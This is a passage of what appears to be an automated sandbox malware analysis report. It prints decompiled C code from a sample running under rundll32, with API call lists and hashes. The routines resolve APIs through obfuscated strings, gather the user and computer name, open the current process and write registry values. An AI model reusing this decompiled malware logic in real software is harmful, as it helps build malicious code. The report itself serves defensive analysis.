                                                  					_v8 = _t13;
                                                  					_t41 = E052D2049(_v8 +  *_t40(_a4) + 1);
                                                  					if(_t41 != 0) {
                                                  						strcpy(_t41, _t28);
                                                  						_pop(_t33);
                                                  						__imp__(_t41, _a4);
                                                  						_t36 = E052D7225(_t34, _t41, _a8);
                                                  						E052D9039(_t41);
                                                  						_t42 = E052D8E82(StrTrimA(_t36, "="), _t36);
                                                  						if(_t42 != 0) {
                                                  							E052D9039(_t36);
                                                  							_t36 = _t42;
                                                  						}
                                                  						_t43 = E052D788B(_t36, _t33);
                                                  						if(_t43 != 0) {
                                                  							E052D9039(_t36);
                                                  							_t36 = _t43;
                                                  						}
                                                  					}
                                                  					E052D9039(_t28);
                                                  				}
                                                  				return _t36;
                                                  			}

                                                  Instruction addresses (one per decompiled statement, in listing order):
                                                  0x052d8307 0x052d830a 0x052d830b 0x052d8313 0x052d831a 0x052d8321 0x052d8325 0x052d832b
                                                  0x052d8332 0x052d8337 0x052d8349 0x052d834d 0x052d8351 0x052d8357 0x052d835c 0x052d836c
                                                  0x052d836e 0x052d8385 0x052d8389 0x052d838c 0x052d8391 0x052d8391 0x052d839a 0x052d839e
                                                  0x052d83a1 0x052d83a6 0x052d83a6 0x052d839e 0x052d83a9 0x052d83a9 0x052d83b4

                                                  APIs
                                                    • Part of subcall function 052D9401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,052D8321,253D7325,00000000,00000000,74ECC740,?,?,052DA428,?), ref: 052D9468
                                                    • Part of subcall function 052D9401: sprintf.NTDLL ref: 052D9489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,052DA428,?,073095B0), ref: 052D8332
                                                  • lstrlen.KERNEL32(?,?,?,052DA428,?,073095B0), ref: 052D833A
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • strcpy.NTDLL ref: 052D8351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 052D835C
                                                    • Part of subcall function 052D7225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,052D836B,00000000,?,?,?,052DA428,?,073095B0), ref: 052D723C
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,052DA428,?,073095B0), ref: 052D8379
                                                    • Part of subcall function 052D8E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,052D8385,00000000,?,?,052DA428,?,073095B0), ref: 052D8E8C
                                                    • Part of subcall function 052D8E82: _snprintf.NTDLL ref: 052D8EEA
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: c6be631a6f7576058ab6762d8ce1cc6a7290598c045f232154c0558cb944a188
                                                  • Instruction ID: 4cf06d3e0e569a99b209759c0b4ce66ce0e51c8f8391a603b3b0c67ce6f9584b
                                                  • Opcode Fuzzy Hash: c6be631a6f7576058ab6762d8ce1cc6a7290598c045f232154c0558cb944a188
                                                  • Instruction Fuzzy Hash: 7211C633A25625B787127BB5BC8CC7FBA9D9F845617054116F909A7100DE35DD0297F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 052D6D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 052D6D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 052D6D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D6DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D6DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D6DC3
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 62be79a40de23c43a82dfcbfe962e7cb7d61053ed945cdb54a9b98aaadc96cfe
                                                  • Instruction ID: 9ad3dc61fde216e12506818acab91a40b71af53454c83f17f2f3105f7a024e58
                                                  • Opcode Fuzzy Hash: 62be79a40de23c43a82dfcbfe962e7cb7d61053ed945cdb54a9b98aaadc96cfe
                                                  • Instruction Fuzzy Hash: 88316D32D10609AFDB01DFA8D848A9EBBBAAF49210F144425E915EB150DB71A906CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E052D692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t23;
                                                  				intOrPtr _t26;
                                                  				_Unknown_base(*)()* _t28;
                                                  				intOrPtr _t30;
                                                  				_Unknown_base(*)()* _t32;
                                                  				intOrPtr _t33;
                                                  				_Unknown_base(*)()* _t35;
                                                  				intOrPtr _t36;
                                                  				_Unknown_base(*)()* _t38;
                                                  				intOrPtr _t39;
                                                  				_Unknown_base(*)()* _t41;
                                                  				intOrPtr _t44;
                                                  				struct HINSTANCE__* _t48;
                                                  				intOrPtr _t54;
                                                  
                                                  				_t54 = E052D2049(0x20);
                                                  				if(_t54 == 0) {
                                                  					_v8 = 8;
                                                  				} else {
                                                  					_t23 =  *0x52dd27c; // 0x202a5a8
                                                  					_t1 = _t23 + 0x52de11a; // 0x4c44544e
                                                  					_t48 = GetModuleHandleA(_t1);
                                                  					_t26 =  *0x52dd27c; // 0x202a5a8
                                                  					_t2 = _t26 + 0x52de769; // 0x7243775a
                                                  					_v8 = 0x7f;
                                                  					_t28 = GetProcAddress(_t48, _t2);
                                                  					 *(_t54 + 0xc) = _t28;
                                                  					if(_t28 == 0) {
                                                  						L8:
                                                  						E052D9039(_t54);
                                                  					} else {
                                                  						_t30 =  *0x52dd27c; // 0x202a5a8
                                                  						_t5 = _t30 + 0x52de756; // 0x614d775a
                                                  						_t32 = GetProcAddress(_t48, _t5);
                                                  						 *(_t54 + 0x10) = _t32;
                                                  						if(_t32 == 0) {
                                                  							goto L8;
                                                  						} else {
                                                  							_t33 =  *0x52dd27c; // 0x202a5a8
                                                  							_t7 = _t33 + 0x52de40b; // 0x6e55775a
                                                  							_t35 = GetProcAddress(_t48, _t7);
                                                  							 *(_t54 + 0x14) = _t35;
                                                  							if(_t35 == 0) {
                                                  								goto L8;
                                                  							} else {
                                                  								_t36 =  *0x52dd27c; // 0x202a5a8
                                                  								_t9 = _t36 + 0x52de4d2; // 0x4e6c7452
                                                  								_t38 = GetProcAddress(_t48, _t9);
                                                  								 *(_t54 + 0x18) = _t38;
                                                  								if(_t38 == 0) {
                                                  									goto L8;
                                                  								} else {
                                                  									_t39 =  *0x52dd27c; // 0x202a5a8
                                                  									_t11 = _t39 + 0x52de779; // 0x6c43775a
                                                  									_t41 = GetProcAddress(_t48, _t11);
                                                  									 *(_t54 + 0x1c) = _t41;
                                                  									if(_t41 == 0) {
                                                  										goto L8;
                                                  									} else {
                                                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                  										_t44 = E052D727B(_t54, _a8);
                                                  										_v8 = _t44;
                                                  										if(_t44 != 0) {
                                                  											goto L8;
                                                  										} else {
                                                  											 *_a12 = _t54;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v8;
                                                  			}
                                                  Instruction addresses for the listing above (address column of the side-by-side view, one entry per code line): 0x052d693b .. 0x052d6a0f

                                                  APIs
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,052D207A,?,00000001,?,?,00000000,00000000), ref: 052D6951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 052D6973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 052D6989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 052D699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 052D69B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 052D69CB
                                                    • Part of subcall function 052D727B: memset.NTDLL ref: 052D72FA
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: 348448ddc4a14e29420a32c1ec2099d319f4e32488bcfb2b0141390f09c06d5c
                                                  • Instruction ID: 4d6a001f19dc4c41fe84d2ae47ea8cb95ec0fa2b9ae8bcb70f142333fe556c9c
                                                  • Opcode Fuzzy Hash: 348448ddc4a14e29420a32c1ec2099d319f4e32488bcfb2b0141390f09c06d5c
                                                  • Instruction Fuzzy Hash: 8C2165B161160AEFDB60DFB9DC88D56BBECFF18254B014125F549CB281D734E9018B70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E052D7649() {
                                                  				long _v8;
                                                  				long _v12;
                                                  				int _v16;
                                                  				long _t39;
                                                  				long _t43;
                                                  				signed int _t47;
                                                  				signed int _t52;
                                                  				int _t56;
                                                  				int _t57;
                                                  				char* _t63;
                                                  				short* _t66;
                                                  
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				GetUserNameW(0,  &_v8);
                                                  				_t39 = _v8;
                                                  				if(_t39 != 0) {
                                                  					_v12 = _t39;
                                                  					_v8 = 0;
                                                  					GetComputerNameW(0,  &_v8);
                                                  					_t43 = _v8;
                                                  					if(_t43 != 0) {
                                                  						_v12 = _v12 + _t43 + 2;
                                                  						_t63 = E052D2049(_v12 + _t43 + 2 << 2);
                                                  						if(_t63 != 0) {
                                                  							_t47 = _v12;
                                                  							_t66 = _t63 + _t47 * 2;
                                                  							_v8 = _t47;
                                                  							if(GetUserNameW(_t66,  &_v8) == 0) {
                                                  								L7:
                                                  								E052D9039(_t63);
                                                  							} else {
                                                  								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                                                  								_t52 = _v8;
                                                  								_v12 = _v12 - _t52;
                                                  								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                                                  									goto L7;
                                                  								} else {
                                                  									_t56 = _v12 + _v8;
                                                  									_t31 = _t56 + 2; // 0x52da33a
                                                  									_v12 = _t56;
                                                  									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
                                                  									_v8 = _t57;
                                                  									if(_t57 == 0) {
                                                  										goto L7;
                                                  									} else {
                                                  										_t63[_t57] = 0;
                                                  										_v16 = _t63;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v16;
                                                  			}
                                                  Instruction addresses for the listing above (address column of the side-by-side view, one entry per code line): 0x052d7657 .. 0x052d771a

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,052DA338), ref: 052D765D
                                                  • GetComputerNameW.KERNEL32(00000000,052DA338), ref: 052D7679
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • GetUserNameW.ADVAPI32(00000000,052DA338), ref: 052D76B3
                                                  • GetComputerNameW.KERNEL32(052DA338,?), ref: 052D76D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,052DA338,00000000,052DA33A,00000000,00000000,?,?,052DA338), ref: 052D76F8
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: 3fde8fdf8c9adc18679bec2942ed8ebc04e69bc03bf6f3e413d8eccc89e586b5
                                                  • Instruction ID: f4c189943f989c2b51211fdc912fca7e257bce6ae87ce0ecad31856b11fddbc8
                                                  • Opcode Fuzzy Hash: 3fde8fdf8c9adc18679bec2942ed8ebc04e69bc03bf6f3e413d8eccc89e586b5
                                                  • Instruction Fuzzy Hash: 8021D776910209FBDB11DFA9D989DEEFBB8EE44200B5444AAE506E7240DB349B44DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E052D1585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                  				void* __esi;
                                                  				long _t10;
                                                  				void* _t18;
                                                  				void* _t22;
                                                  
                                                  				_t9 = __eax;
                                                  				_t22 = __eax;
                                                  				if(_a4 != 0 && E052D7F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                  					L9:
                                                  					return GetLastError();
                                                  				}
                                                  				_t10 = E052DA9AB(_t9, _t18, _t22, _a8);
                                                  				if(_t10 == 0) {
                                                  					ResetEvent( *(_t22 + 0x1c));
                                                  					ResetEvent( *(_t22 + 0x20));
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0xffffffff);
                                                  					_push(0);
                                                  					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                  					if( *0x52dd130() != 0) {
                                                  						SetEvent( *(_t22 + 0x1c));
                                                  						goto L7;
                                                  					} else {
                                                  						_t10 = GetLastError();
                                                  						if(_t10 == 0x3e5) {
                                                  							L7:
                                                  							_t10 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				if(_t10 == 0xffffffff) {
                                                  					goto L9;
                                                  				}
                                                  				return _t10;
                                                  			}
                                                  Instruction addresses for the listing above (address column of the side-by-side view, one entry per code line): 0x052d1585 .. 0x052d15fb

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,052D11DA,?,?,00000000,00000000), ref: 052D15BF
                                                  • ResetEvent.KERNEL32(?), ref: 052D15C4
                                                  • GetLastError.KERNEL32 ref: 052D15DC
                                                  • GetLastError.KERNEL32(?,?,00000102,052D11DA,?,?,00000000,00000000), ref: 052D15F7
                                                    • Part of subcall function 052D7F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,052D15A4,?,?,?,?,00000102,052D11DA,?,?,00000000), ref: 052D7F33
                                                    • Part of subcall function 052D7F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,052D15A4,?,?,?,?,00000102,052D11DA,?), ref: 052D7F91
                                                    • Part of subcall function 052D7F27: lstrcpy.KERNEL32(00000000,00000000), ref: 052D7FA1
                                                  • SetEvent.KERNEL32(?), ref: 052D15EA
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: 2b4d88ed6eecb8a88834ae84f2f30f72099229cbe1364e14d92ca438efa74264
                                                  • Instruction ID: 8da7544589af7ee5580c1b5d17f6c4a29480e020cf8fa325ff85455e548a8eb0
                                                  • Opcode Fuzzy Hash: 2b4d88ed6eecb8a88834ae84f2f30f72099229cbe1364e14d92ca438efa74264
                                                  • Instruction Fuzzy Hash: 6F01A2311256026BD7306B61EC48F1BFAA9FF443B1F104B25F097E14E0DA24E825DA30
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E052D8F10(intOrPtr _a4) {
                                                  				void* _t2;
                                                  				long _t4;
                                                  				void* _t5;
                                                  				long _t6;
                                                  				void* _t7;
                                                  				void* _t13;
                                                  
                                                  				_t2 = CreateEventA(0, 1, 0, 0);
                                                  				 *0x52dd26c = _t2;
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				_t4 = GetVersion();
                                                  				if(_t4 != 5) {
                                                  					L4:
                                                  					if(_t13 <= 0) {
                                                  						_t5 = 0x32;
                                                  						return _t5;
                                                  					}
                                                  					L5:
                                                  					 *0x52dd25c = _t4;
                                                  					_t6 = GetCurrentProcessId();
                                                  					 *0x52dd258 = _t6;
                                                  					 *0x52dd264 = _a4;
                                                  					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                  					 *0x52dd254 = _t7;
                                                  					if(_t7 == 0) {
                                                  						 *0x52dd254 =  *0x52dd254 | 0xffffffff;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				if(_t4 > 0) {
                                                  					goto L5;
                                                  				}
                                                  				_t13 = _t4 - _t4;
                                                  				goto L4;
                                                  			}
                                                  Address column (instruction address of each decompiled statement above, in order; 0x00000000 marks a line with no address):
                                                  0x052d8f18, 0x052d8f20, 0x052d8f25, 0x00000000, 0x052d8f7a, 0x052d8f27, 0x052d8f2f, 0x052d8f37,
                                                  0x052d8f37, 0x052d8f77, 0x00000000, 0x052d8f77, 0x052d8f39, 0x052d8f39, 0x052d8f3e, 0x052d8f50,
                                                  0x052d8f55, 0x052d8f5b, 0x052d8f63, 0x052d8f68, 0x052d8f6a, 0x052d8f6a, 0x00000000, 0x052d8f71,
                                                  0x052d8f33, 0x00000000, 0x00000000, 0x052d8f35, 0x00000000

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,052D6A90,?,?,00000001,?,?,?,052D807D,?), ref: 052D8F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,052D807D,?), ref: 052D8F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,052D807D,?), ref: 052D8F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,052D807D,?), ref: 052D8F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,052D807D,?), ref: 052D8F7A
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: 974510a3798bf258627a639ad74f07f9706b0376ad93e800f27dff32d7dff813
                                                  • Instruction ID: 69b116feb49a3beb3b924c7760800b07266d05c2c19306ee30f4728d13c23675
                                                  • Opcode Fuzzy Hash: 974510a3798bf258627a639ad74f07f9706b0376ad93e800f27dff32d7dff813
                                                  • Instruction Fuzzy Hash: 3EF03C70AB63429EE7208F64BD1EB24BF66BF447A1F904519F186D61C2DA708441CE34
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E052D17D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                  				signed int _v8;
                                                  				char _v12;
                                                  				signed int* _v16;
                                                  				char _v284;
                                                  				void* __esi;
                                                  				char* _t60;
                                                  				intOrPtr* _t61;
                                                  				intOrPtr _t65;
                                                  				char _t68;
                                                  				intOrPtr _t72;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t75;
                                                  				void* _t78;
                                                  				void* _t88;
                                                  				void* _t97;
                                                  				void* _t98;
                                                  				char _t104;
                                                  				signed int* _t106;
                                                  				intOrPtr* _t107;
                                                  				void* _t108;
                                                  
                                                  				_t98 = __ecx;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t104 = _a16;
                                                  				if(_t104 == 0) {
                                                  					__imp__( &_v284,  *0x52dd33c);
                                                  					_t97 = 0x80000002;
                                                  					L6:
                                                  					_t60 = E052D809F(0,  &_v284);
                                                  					_a8 = _t60;
                                                  					if(_t60 == 0) {
                                                  						_v8 = 8;
                                                  						L29:
                                                  						_t61 = _a20;
                                                  						if(_t61 != 0) {
                                                  							 *_t61 =  *_t61 + 1;
                                                  						}
                                                  						return _v8;
                                                  					}
                                                  					_t107 = _a24;
                                                  					if(E052D88B7(_t98, _t103, _t107, _t97, _t60) != 0) {
                                                  						L27:
                                                  						E052D9039(_a8);
                                                  						goto L29;
                                                  					}
                                                  					_t65 =  *0x52dd27c; // 0x202a5a8
                                                  					_t16 = _t65 + 0x52de8fe; // 0x65696c43
                                                  					_t68 = E052D809F(0, _t16);
                                                  					_a24 = _t68;
                                                  					if(_t68 == 0) {
                                                  						L14:
                                                  						_t29 = _t107 + 0x14; // 0x102
                                                  						_t33 = _t107 + 0x10; // 0x3d052dc0
                                                  						if(E052DA635(_t103,  *_t33, _t97, _a8,  *0x52dd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                  							_t72 =  *0x52dd27c; // 0x202a5a8
                                                  							if(_t104 == 0) {
                                                  								_t35 = _t72 + 0x52dea5f; // 0x4d4c4b48
                                                  								_t73 = _t35;
                                                  							} else {
                                                  								_t34 = _t72 + 0x52de89f; // 0x55434b48
                                                  								_t73 = _t34;
                                                  							}
                                                  							if(E052D816C(_t73,  *0x52dd334,  *0x52dd338,  &_a24,  &_a16) == 0) {
                                                  								if(_t104 == 0) {
                                                  									_t75 =  *0x52dd27c; // 0x202a5a8
                                                  									_t44 = _t75 + 0x52de871; // 0x74666f53
                                                  									_t78 = E052D809F(0, _t44);
                                                  									_t105 = _t78;
                                                  									if(_t78 == 0) {
                                                  										_v8 = 8;
                                                  									} else {
                                                  										_t47 = _t107 + 0x10; // 0x3d052dc0
                                                  										E052D2659( *_t47, _t97, _a8,  *0x52dd338, _a24);
                                                  										_t49 = _t107 + 0x10; // 0x3d052dc0
                                                  										E052D2659( *_t49, _t97, _t105,  *0x52dd330, _a16);
                                                  										E052D9039(_t105);
                                                  									}
                                                  								} else {
                                                  									_t40 = _t107 + 0x10; // 0x3d052dc0
                                                  									E052D2659( *_t40, _t97, _a8,  *0x52dd338, _a24);
                                                  									_t43 = _t107 + 0x10; // 0x3d052dc0
                                                  									E052D2659( *_t43, _t97, _a8,  *0x52dd330, _a16);
                                                  								}
                                                  								if( *_t107 != 0) {
                                                  									E052D9039(_a24);
                                                  								} else {
                                                  									 *_t107 = _a16;
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L27;
                                                  					}
                                                  					_t21 = _t107 + 0x10; // 0x3d052dc0
                                                  					if(E052D6BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                  						_t106 = _v16;
                                                  						_t88 = 0x28;
                                                  						if(_v12 == _t88) {
                                                  							 *_t106 =  *_t106 & 0x00000000;
                                                  							_t26 = _t107 + 0x10; // 0x3d052dc0
                                                  							E052DA635(_t103,  *_t26, _t97, _a8, _a24, _t106);
                                                  						}
                                                  						E052D9039(_t106);
                                                  						_t104 = _a16;
                                                  					}
                                                  					E052D9039(_a24);
                                                  					goto L14;
                                                  				}
                                                  				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                  					goto L29;
                                                  				} else {
                                                  					_t103 = _a8;
                                                  					E052DA8D8(_t104, _a8,  &_v284);
                                                  					__imp__(_t108 + _t104 - 0x117,  *0x52dd33c);
                                                  					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                                                  					_t97 = 0x80000003;
                                                  					goto L6;
                                                  				}
                                                  			}
                                                  Address column (instruction address of each decompiled statement above, in order; 0x00000000 marks a line with no address):
                                                  0x052d17d5, 0x052d17de, 0x052d17e5, 0x052d17ea, 0x052d1857, 0x052d185d, 0x052d1862, 0x052d186b,
                                                  0x052d1872, 0x052d1875, 0x052d19e9, 0x052d19f0, 0x052d19f0, 0x052d19f5, 0x052d19f7, 0x052d19f7,
                                                  0x052d1a00, 0x052d1a00, 0x052d187b, 0x052d1887, 0x052d19df, 0x052d19e2, 0x00000000, 0x052d19e2,
                                                  0x052d188d, 0x052d1892, 0x052d189b, 0x052d18a2, 0x052d18a5, 0x052d18ef, 0x052d18ef, 0x052d1902,
                                                  0x052d190c, 0x052d1914, 0x052d1919, 0x052d1923, 0x052d1923, 0x052d191b, 0x052d191b, 0x052d191b,
                                                  0x052d191b, 0x052d1945, 0x052d194d, 0x052d197b, 0x052d1980, 0x052d1989, 0x052d198e, 0x052d1992,
                                                  0x052d19c4, 0x052d1994, 0x052d19a1, 0x052d19a4, 0x052d19b4, 0x052d19b7, 0x052d19bd, 0x052d19bd,
                                                  0x052d194f, 0x052d195c, 0x052d195f, 0x052d1971, 0x052d1974, 0x052d1974, 0x052d19ce, 0x052d19da,
                                                  0x052d19d0, 0x052d19d3, 0x052d19d3, 0x052d19ce, 0x052d1945, 0x00000000, 0x052d190c, 0x052d18b4,
                                                  0x052d18be, 0x052d18c0, 0x052d18c5, 0x052d18c9, 0x052d18cb, 0x052d18d6, 0x052d18d9, 0x052d18d9,
                                                  0x052d18df, 0x052d18e4, 0x052d18e4, 0x052d18ea, 0x00000000, 0x052d18ea, 0x052d17ef, 0x00000000,
                                                  0x052d1816, 0x052d1816, 0x052d1822, 0x052d1835, 0x052d183b, 0x052d1843, 0x00000000, 0x052d1843

                                                  APIs
                                                  • StrChrA.SHLWAPI(052D3C81,0000005F,00000000,00000000,00000104), ref: 052D1808
                                                  • lstrcpy.KERNEL32(?,?), ref: 052D1835
                                                    • Part of subcall function 052D809F: lstrlen.KERNEL32(?,00000000,052DD330,00000001,052D2200,052DD00C,052DD00C,00000000,00000005,00000000,00000000,?,?,?,052D96C1,052D23E9), ref: 052D80A8
                                                    • Part of subcall function 052D809F: mbstowcs.NTDLL ref: 052D80CF
                                                    • Part of subcall function 052D809F: memset.NTDLL ref: 052D80E1
                                                    • Part of subcall function 052D2659: lstrlenW.KERNEL32(052D3C81,?,?,052D19A9,3D052DC0,80000002,052D3C81,052D8B1E,74666F53,4D4C4B48,052D8B1E,?,3D052DC0,80000002,052D3C81,?), ref: 052D2679
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 052D1857
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
